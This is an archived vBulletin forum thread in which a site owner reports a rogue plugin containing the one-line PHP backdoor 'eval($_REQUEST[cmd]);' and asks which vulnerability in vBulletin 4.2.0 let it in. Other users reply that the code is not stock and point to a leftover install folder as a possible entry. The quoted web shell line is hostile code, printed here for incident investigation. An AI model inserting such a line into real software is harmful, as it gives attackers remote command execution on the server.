The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Dangerous SQL injection vulnerability in 4:2:0?
This week we found a new plugin (we are still investigating about "how") with this code:
Code:
eval($_REQUEST[cmd]); Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2? Seems to be similar to this one: http://www.pcworld.com/article/24555...erability.html |
#2
|
|||
|
|||
This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.
|
#3
|
|||
|
|||
I knew that ................. i'm just asking if there is some known vulnerability in vbulletin 4.2.0 l2 that let bad guys do some sql injection in tables like plugin, so that i can save time investigating by myself to find the exploit used to inject that code.
|
#4
|
|||
|
|||
We don't know what plugins you have or if you have the install folder still in your FTP so its hard to answer. The best way would be to get someone to login and fix your problem if you don't know how to do it yourself
|
#5
|
|||
|
|||
As far as I know there is no public exploit for vBulletin 4.2+, a private exploit is always possible or a vulnerable plugin.
|
#6
|
||||
|
||||
No, there isnt.
|
#7
|
||||
|
||||
In 4.2? If you've left the install folder around, yes. If you haven't no.
|
#8
|
|||
|
|||
It's the first thing i 've deleted after finishing installing it
|
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|